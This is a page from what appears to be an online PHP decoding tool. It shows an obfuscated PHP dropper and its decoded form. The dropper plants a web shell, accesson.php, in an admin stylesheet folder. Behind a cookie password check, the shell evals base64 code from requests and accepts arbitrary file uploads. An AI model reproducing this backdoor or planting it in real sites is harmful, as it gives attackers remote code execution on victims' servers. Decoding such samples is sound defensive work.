Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $s = $_SERVER['DOCUMENT_ROOT'].'/admin/view/stylesheet/';$fh = fopen($s.'accesson.p..
Decoded Output download
<?php
$s = $_SERVER['DOCUMENT_ROOT'].'/admin/view/stylesheet/';$fh = fopen($s.'accesson.php', 'w');fwrite($fh, '<?=409723*20;if(md5($_COOKIE[d])=="17028f487cb2a84607646da3ad3878ec"){echo"ok";eval(base64_decode($_REQUEST[id]));if($_POST["up"]=="up"){@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);}}?>');fclose($fh);
Did this file decode correctly?
Original Code
<?php
$s = $_SERVER['DOCUMENT_ROOT'].'/admin/view/stylesheet/';$fh = fopen($s.'accesson.php', 'w');fwrite($fh, '<?=409723*20;if(md5($_COOKIE[d])=="\61\x37\60\62\x38\146\x34\70\67\143\142\x32\141\70\x34\x36\x30\67\x36\64\x36\x64\141\63\141\144\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST[id]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\x5f\x6e\x61\x6d\x65"],$_FILES["\146\x69\154\x65"]["\156\141\155\x65"]);}}?>');fclose($fh);
Function Calls
fopen | 1 |
fwrite | 1 |
Stats
MD5 | e2e245c9f84856de59a02a90135a7f71 |
Eval Count | 0 |
Decode Time | 114 ms |